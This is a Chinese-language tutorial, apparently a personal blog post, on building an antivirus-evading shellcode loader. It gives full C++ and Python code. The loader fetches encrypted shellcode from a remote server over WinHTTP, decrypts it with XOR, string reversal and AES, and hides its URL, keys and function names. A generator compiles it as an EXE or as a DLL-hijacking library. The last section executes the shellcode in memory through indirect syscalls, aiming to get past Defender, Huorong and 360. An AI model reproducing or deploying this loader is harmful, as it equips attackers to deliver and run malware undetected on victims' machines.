python动态生成C++免杀加载器,并且通过 间接系统调用 绕过Windows Defender,火绒,360的教程
记录一下我是怎么写的:
(我非网安专业,技术有不严谨的地方,下面的代码属于我从表面上知道杀软怎么查杀的,然后根据教程编写出来的
分离免杀策略
无论是直接用数组存shellcode还是存加密后的shellcode,在C++里面直接硬编码大片的shellcode数据不是一个好习惯,使得生成的exe特征明显,而且容易被静态杀掉
所谓分离,就是把loader和shellcode分离出来
一般有两种策略:
把shellcode放在本地的另一个文件
把shellcode托管在网络服务器上
我选择了第二种
在C++动态读取shellcode
编写一个通过winhttp下载shellcode的函数
#include <windows.h>
#include <winhttp.h>
BOOL WinhttpGET(const wchar_t* url, const wchar_t* file, void** buf, PDWORD bufsize, int port) {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
BOOL bResults = FALSE;
DWORD dwSize = 0, dwDownloaded = 0;
LPSTR pszOutBuffer = NULL;
BOOL bSuccess = FALSE;
// Initialize WinHTTP session
hSession = WinHttpOpen("winhttp/1.0",
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, 0);
if (hSession) {
// Specify the target server
hConnect = WinHttpConnect(hSession, url, port, 0);
}
if (hConnect) {
// Create an HTTP request
hRequest = WinHttpOpenRequest(hConnect, L"GET", file,
NULL, WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
0);
}
if (hRequest) {
// Send the request
bResults = WinHttpSendRequest(hRequest,
WINHTTP_NO_ADDITIONAL_HEADERS, 0,
WINHTTP_NO_REQUEST_DATA, 0,
0, 0);
}
if (bResults) {
// Receive the response
bResults = WinHttpReceiveResponse(hRequest, NULL);
}
if (bResults) {
DWORD totalSize = 0;
// Initialize a dynamic buffer
*buf = NULL;
*bufsize = 0;
// Keep checking for data until there is nothing left
do {
// Check for available data
dwSize = 0;
if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
#ifdef DEBUG_MODE
printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
#endif
break;
}
if (dwSize == 0)
break;
// Allocate temporary buffer
pszOutBuffer = (LPSTR)malloc(dwSize);
if (!pszOutBuffer) {
#ifdef DEBUG_MODE
printf("Out of memory\n");
dwSize = 0;
#endif
break;
}
// Read the data
ZeroMemory(pszOutBuffer, dwSize);
if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {
#ifdef DEBUG_MODE
printf("Error %u in WinHttpReadData.\n", GetLastError());
#endif
free(pszOutBuffer);
break;
} else {
// Reallocate the output buffer to fit the new data
*buf = realloc(*buf, totalSize + dwDownloaded);
if (*buf == NULL) {
#ifdef DEBUG_MODE
printf("Out of memory\n");
#endif
free(pszOutBuffer);
break;
}
// Copy the new data into the output buffer
//print_shellcode((void*)pszOutBuffer, dwDownloaded);
memcpy((char*)*buf + totalSize, pszOutBuffer, dwDownloaded);
totalSize += dwDownloaded;
*bufsize = totalSize;
bSuccess = TRUE;
}
// Free the temporary buffer
free(pszOutBuffer);
} while (dwSize > 0);
}
// Report errors
#ifdef DEBUG_MODE
if (!bResults) {
printf("Error %d has occurred.\n", GetLastError());
}
#endif
// Close open handles
if (hRequest) WinHttpCloseHandle(hRequest);
if (hConnect) WinHttpCloseHandle(hConnect);
if (hSession) WinHttpCloseHandle(hSession);
return bSuccess;
}
加密处理
选择的方案是:异或加密+逆序字符串+AES加密
算法放在下面了,有些变量需要你自行修改一下
注意这个AES解密算法的实现方式是根据我的python脚本设计的
def aes_encrypt(data, key):
iv = 16 * b'\x00'
cipher = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv)
encrypted_data = cipher.encrypt(pad(data, AES.block_size))
return encrypted_data
char XORKeyData[] = {REPLACEME_KEY, 0x00}; // Reversed key
int AESDecrypt(char* difern, unsigned int difern_len, char* key, size_t keylen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
return -1;
}
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
return -1;
}
if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
return -1;
}
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
return -1;
}
if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, difern, &difern_len)) {
return -1;
}
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
return 0;
}
void XorData(char *data, size_t dataLen, const char *key, size_t keyLen) {
for (size_t i = 0; i < dataLen; i++) {
data[i] ^= key[i % keyLen];
}
}
std::string DecryptOnFly(const std::vector<unsigned char>& data) {
// Make a copy of data to be mutable
std::vector<char> mutableData(data.begin(), data.end());
// Decrypt the data
XorData(mutableData.data(), mutableData.size(), XORKeyData, sizeof(XORKeyData) - 1);
// Decode the decrypted data
return std::string(mutableData.begin(), mutableData.end());
}
void ReverseString(char *data, size_t dataLen) {
int start = 0;
int end = dataLen - 1;
while (start < end) {
char temp = data[start];
data[start] = data[end];
data[end] = temp;
start++;
end--;
}
}
void GetXORKey(char *data, unsigned int *key_len ) {
for (int i = 0; i < sizeof(XORKeyData)-1;i++) {
data[i] = XORKeyData[i];
}
*key_len = sizeof(XORKeyData)-1;
}
至此,loader加载shellcode的流程是:
动态解密被异或后的url,文件名,以及端口
连接到文件托管服务器
通过winhttp接收被AES加密后的shellcode
在程序里解密shellcode
结合Python,动态生成loader
有了加密算法,我们还需要加密所需要的密钥
那么问题来了,如何存储密钥,而且让程序没那么容易被逆向分析?
动态代码生成
答案是动态生成密钥,然后硬编码在C++里面,可以保证每次生成的loader特征会稍微不一样
一个简单的方法是通过字符串替换
比如在C++里硬编码:REPLACEME_KEY, REPLACEME_URL, REPLACEME_PORT, REPLACEME_FILE
char XORKeyData[] = {REPLACEME_KEY, 0x00}; // Reversed key
char Encrypted_URL[] = {REPLACEME_URL, 0x00}; // Reversed URL
char Encrypted_Port[] = {REPLACEME_PORT, 0x00}; // Reversed Port
char Encrypted_File[] = {REPLACEME_FILE, 0x00};
char XORKeyData[256];
unsigned int key_len;
GetXORKey(XORKeyData, &key_len);
ReverseString(Encrypted_URL, sizeof(Encrypted_URL) - 1);
XorData(Encrypted_URL, sizeof(Encrypted_URL) - 1, XORKeyData, key_len);
ReverseString(Encrypted_Port, sizeof(Encrypted_Port) - 1);
XorData(Encrypted_Port, sizeof(Encrypted_Port) - 1, XORKeyData, key_len);
ReverseString(Encrypted_File, sizeof(Encrypted_File) - 1);
XorData(Encrypted_File, sizeof(Encrypted_File) - 1, XORKeyData, key_len);
把项目的源代码都放到 src 文件夹里面,然后在src旁边建一个cache文件夹
把带有main函数的template.cpp放到src里面
然后在python里面,我们读取模版c++文件,然后对自定义的片段进行替换:
for f_str in os.listdir("src"):
if f_str.endswith(".cpp") or f_str.endswith(".h"):
with open(os.path.join("src", f_str), "r") as f:
source = f.read()
source = source.replace("REPLACEME_URL", to_c_array(url))
source = source.replace("REPLACEME_PORT", to_c_array(port))
source = source.replace("REPLACEME_FILE", to_c_array(file))
source = source.replace("REPLACEME_KEY", to_c_array(random_key))
for name, obf in obfuscated.items():
source = source.replace(name, to_c_array(obf))
for name in random_names:
source = source.replace(name, modified_function[name])
cache_path = os.path.join("cache", f_str)
modified_source.append(cache_path)
with open(cache_path, "w") as t:
t.write(source)
那么,经过替换后,我们的c++代码会变成:
char Encrypted_URL[] = {0x34, 0x45, 0x5b, 0x0, 0x00}; // Reversed URL
char Encrypted_Port[] = {0x72, 0x52, 0x46, 0x46, 0x00}; // Reversed Port
char Encrypted_File[] = {0x3, 0xa, 0x5b, 0x00};
char uWvfsDAUgdsGxnBi[256];
unsigned int key_len;
//顺便随机化了函数名,具体实现贴在了下面完整的python代码
elMQuAlwfOlpAcsb(uWvfsDAUgdsGxnBi, &key_len);
tNuEkdfEHemjAeuq(Encrypted_URL, sizeof(Encrypted_URL) - 1);
PyQIGtiyBPTajbjG(Encrypted_URL, sizeof(Encrypted_URL) - 1, uWvfsDAUgdsGxnBi, key_len);
tNuEkdfEHemjAeuq(Encrypted_Port, sizeof(Encrypted_Port) - 1);
PyQIGtiyBPTajbjG(Encrypted_Port, sizeof(Encrypted_Port) - 1, uWvfsDAUgdsGxnBi, key_len);
tNuEkdfEHemjAeuq(Encrypted_File, sizeof(Encrypted_File) - 1);
PyQIGtiyBPTajbjG(Encrypted_File, sizeof(Encrypted_File) - 1, uWvfsDAUgdsGxnBi, key_len);
编译
然后调用系统的mingw编译器
command = [
"x86_64-w64-mingw32-g++"
] + [file for file in modified_source if file.endswith(".cpp")] + [
"-fpermissive", "-Wno-narrowing", "-lwinhttp", "-lcrypt32", "-lwinpthread",
"-O2", "-static", "-static-libgcc", "-static-libstdc++", "-DNDEBUG", "-w"
]
command.append("-mwindows")
command.extend(["-o", MALWARE])
print(command)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
if process.returncode != 0:
print("Error: " + error.decode())
print("!!!Compilation failed!!!")
else:
for file in modified_source:
os.remove(file)
print("***Loader compiled***")
完整代码
不废话直接贴完整代码:
附加了白加黑 DLL 免杀功能
import os
import subprocess
import sys
import random
import string
import os, string, shutil,re,sys
import pefile
MALWARE = "out.exe"
USE_DEBUG = False
random_names = [
"XORKeyData", "XorData", "AESDecrypt", "DecryptOnFly", "ReverseString",
"WinhttpGET"
]
function_names = {
"REPLACEME_NTDLL_ABS": "c:\\windows\\system32\\ntdll.dll",
"REPLACEME_NTDLL": "ntdll.dll",
"RANDOM_0": "kernel32.dll",
"REPLACEME_AES_KEY": "你的AES密钥",
"REPLACEME_WINHTTP": "winhttp/1.0"
}
def xor(data, key):
return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))
def to_c_array(data):
return ', '.join(hex(ord(c)) for c in data)
if len(sys.argv) < 4:
print("Usage: python3 gen.py <exe/dll> <url> <port> <file> (dll's exe) (dll)")
exit(0)
def dll_gen(module_name,target_dll):
extra_string = ''
pe = pefile.PE(module_name)
for importeddll in pe.DIRECTORY_ENTRY_IMPORT:
DllName = str(importeddll.dll,encoding = "utf-8")
if(DllName != target_dll):
continue
print("即将要劫持的目标为:%s,注意,请确保这个DLL不是系统DLL,如果这个DLL是系统DLL可能会无法劫持成功" % DllName)
i = 1
for importedapi in importeddll.imports:
print(importedapi.name)
FunctionName = str(importedapi.name,encoding = "utf-8")
print("导出函数名为:%s" % FunctionName)
extra_string += """#pragma comment(linker, "/EXPORT:%s=%s,@%s")\n""" % (FunctionName,FunctionName,i)
i+=1
extra_string += """EXTERN_C __declspec(naked) void __cdecl %s(void){}\n""" % (FunctionName)
return extra_string
def main():
char_set = string.ascii_lowercase + string.digits + string.punctuation
random_key = ''.join(random.choices(char_set, k=8))
print(f"Key: {random_key}")
obfuscated = {k: xor(v, random_key) for k, v in function_names.items()}
generation = sys.argv[1]
use_dll = False
dll_exe = ''
dll_file = ''
if generation == 'dll':
use_dll = True
dll_exe = sys.argv[5]
dll_file = sys.argv[6]
elif generation == 'exe':
use_dll = False
else:
print("wrong format.")
exit()
url = xor(sys.argv[2], random_key)[::-1]
port = xor(sys.argv[3], random_key)[::-1]
file = xor('/' + sys.argv[4], random_key)[::-1]
modified_source = []
modified_function = {name: ''.join(random.choices(string.ascii_letters, k=16)) for name in random_names}
if not os.path.exists("src"):
print("Error: 'src' directory does not exist.")
exit(1)
for f_str in os.listdir("src"):
if f_str.endswith(".cpp") or f_str.endswith(".h"):
with open(os.path.join("src", f_str), "r") as f:
source = f.read()
source = source.replace("REPLACEME_URL", to_c_array(url))
source = source.replace("REPLACEME_PORT", to_c_array(port))
source = source.replace("REPLACEME_FILE", to_c_array(file))
source = source.replace("REPLACEME_KEY", to_c_array(random_key))
for name, obf in obfuscated.items():
source = source.replace(name, to_c_array(obf))
for name in random_names:
source = source.replace(name, modified_function[name])
cache_path = os.path.join("cache", f_str)
modified_source.append(cache_path)
with open(cache_path, "w") as t:
t.write(source)
with open("cache/template.cpp", "r") as f:
source = f.read()
if USE_DEBUG:
source = source.replace("REPLACEME_DEBUG", "#define DEBUG_MODE")
else:
source = source.replace("REPLACEME_DEBUG", "")
if use_dll:
source = source.replace("REPLACEME_IF_USE_DLL", "#define USE_DLL_MODE")
source = source.replace("REPLACEME_DLL_IMPORTS", dll_gen(dll_exe, dll_file))
else:
source = source.replace("REPLACEME_IF_USE_DLL", "")
source = source.replace("REPLACEME_DLL_IMPORTS", "")
with open("cache/template.cpp", "w") as f:
f.write(source)
print("Compiling loader...")
command = [
"x86_64-w64-mingw32-g++"
] + [file for file in modified_source if file.endswith(".cpp")] + [
"-fpermissive", "-Wno-narrowing", "-lwinhttp", "-lcrypt32", "-lwinpthread",
"-O2", "-static", "-static-libgcc", "-static-libstdc++", "-DNDEBUG", "-w"
]
if not USE_DEBUG:
command.append("-mwindows")
if use_dll:
command.extend(["-lShlwapi", "-lPsapi", "-shared", "-o", dll_file + ".hjacked"])
else:
command.extend(["-o", MALWARE])
print(command)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
if process.returncode != 0:
print("Error: " + error.decode())
print("!!!Compilation failed!!!")
else:
for file in modified_source:
os.remove(file)
print("***Loader compiled***")
if __name__ == "__main__":
main()
执行shellcode
现在到了我们执行shellcode的阶段
利用系统特性和直接系统调用(Direct System Call)执行,得以免杀主流杀软(火绒、360全部产品、毒霸等),该方式也是主流绕过3环AV、EDR、沙箱的常用手段
我们知道,系统核心态指的是R0,用户态指的是R3,系统代码在核心态下运行,用户代码在用户态下运行。系统中一共有四个权限级别,R1和R2运行设备驱动,R0到R3权限依次降低,R0和R3的权限分别为最高和最低。
Windows 内核基础
此节概念引用自《加密与解密》第7章
现代操作系统一般分为应用层和内核层两部分。应用层通过系统调用进入内核,由系统底层完成响应的功能,这时候内核执行处在该进程的上下文空间中。同时内核处理某些硬件发来的中断请求,代替硬件完成某些功能,这时候内核处在中断的上下文空间中。
#权限级别
系统内核层又叫零环(Ring 0),与此对应的应用层叫3环(即Ring 3)。
CPU 设计者将CPU 的运行级别从内向外分为4个,依次为R0,R1,R2,R3
,运行权限从R0到R3依次降低。操作系统设计者在设计操作系统的时候,并没有使用R1和R2 两个级别(本来应该用来运行设备驱动),而是将设备驱动运行在与内核同级别的R0级。(在AMD64 CPU 之后,CPU 也只保留了R0和R3两个级别)
#R3 与 R0 通信
当应用程序调用一个API 时,实际上是调用应用层的某个DLL 库(如kernel32.dll 、user32.dll)。而此DLL 中还会调用在ntdll.dll 中的Native API 函数。例如当kernel32.dll 中的API 通过ntdll.dll 执行时,会完成参数的检查工作,再调用一个中断(int 2Eh
或者SysEnter/syscall
指令),里面存放了与ntdll.dll 中对应的SSDT 系统服务处理函数,即内核态的Nt*系列函数,它们与ntdll.dll 中的函数一一对应。
大部分API在R3都是处理各种校验,真正执行功能都是在R0(并不是所有的API都是在R0处理)。
ntdll.dll 中的Native API 函数时成对出现的,分别以Nt和Zw 开头,它们本质上是一样的只是名字不同。使用Zw* 系列的API 可以避免额外的参数列表检查,提高效率。
讲了这么多,意思就是我们通过直接系统调用,在R0环执行操作,从而绕过杀软和各种hook的检测
但是对于直接系统调用,系统调用本身及其返回执行发生在执行进程的.exe文件的内存空间中,这会导致调用堆栈的顶帧来自.exe内存,而不是ntdll.dll内存,这个特征可能会导致程序被杀掉,但是间接系统调用的表现就更合法。系统调用的执行和返回指令都发生在ntdll.dll的内存中,这是正常应用程序进程中的预期行为。
框架选择
有几种已知的直接系统调用框架可以选择
HellGate (地狱之门,比较老了)
HaloGate (光环之门)
SysWhispers
SysWhispers2
有几种已知的间接系统调用框架可以选择
SysWhispers3
HWSyscall
我选择了 HWSyscall
HWSyscalls 是一种使用 3 个主要组件执行间接系统调用的新方法:
硬件断点和向量异常处理程序用于控制执行流程。
我通过HWSyscall的库,把Harriet 免杀框架的DirectSyscall部分代码进行了魔改:
LPVOID allocation_start = nullptr;
SIZE_T allocation_size = Random3_len;
HANDLE hThread;
NTSTATUS status;
DWORD oldprotect = 0;
char tmp[256];
strcpy(tmp, DecryptOnFly({RANDOM_1}).c_str());
NtAllocateVirtualMemory_t pNtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)PrepareSyscall((char*)tmp);
if (!pNtAllocateVirtualMemory) {
CleanupSyscalls();
return 0;
}
status = pNtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, &allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (status != 0) {
CleanupSyscalls();
return 0;
}
// Write the payload to the allocated memory
strcpy(tmp, DecryptOnFly({RANDOM_2}).c_str());
NtWriteVirtualMemory_t pNtWriteVirtualMemory = (NtWriteVirtualMemory_t)PrepareSyscall((char*)tmp);
if (!pNtWriteVirtualMemory) {
CleanupSyscalls();
return 0;
}
status = pNtWriteVirtualMemory(GetCurrentProcess(), allocation_start, Random3, Random3_len, 0);
if (status != 0) {
CleanupSyscalls();
return 0;
}
// Change memory protection to PAGE_EXECUTE_READ
ULONG oldProtect;
strcpy(tmp, DecryptOnFly({RANDOM_3}).c_str());
NtProtectVirtualMemory_t pNtProtectVirtualMemory = (NtProtectVirtualMemory_t)PrepareSyscall((char*)tmp);
if (!pNtProtectVirtualMemory) {
CleanupSyscalls();
return 0;
}
status = pNtProtectVirtualMemory(GetCurrentProcess(), &allocation_start, &allocation_size, PAGE_EXECUTE_READ, &oldProtect);
if (status != 0) {
CleanupSyscalls();
return 0;
}
// Create a remote thread to execute the payload
strcpy(tmp, DecryptOnFly({RANDOM_4}).c_str());
NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t)PrepareSyscall((char*)tmp);
if (!pNtCreateThreadEx) {
CleanupSyscalls();
return 0;
}
status = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL);
if (status != 0) {
CleanupSyscalls();
return 0;
}
// Wait for the thread to finish execution
strcpy(tmp, DecryptOnFly({RANDOM_5}).c_str());
NtWaitForSingleObject_t pNtWaitForSingleObject = (NtWaitForSingleObject_t)PrepareSyscall((char*)tmp);
if (!pNtWaitForSingleObject) {
CleanupSyscalls();
return 0;
}
status = pNtWaitForSingleObject(hThread, FALSE, NULL);
if (status != 0) {
CleanupSyscalls();
return 0;
}
strcpy(tmp, DecryptOnFly({RANDOM_6}).c_str());
NtClose_t pNtClose = (NtClose_t)PrepareSyscall((char*)tmp);
if (!pNtClose) {
CleanupSyscalls();
return 0;
}
status = pNtClose(hThread);
if (status != 0) {
CleanupSyscalls();
return 0;
}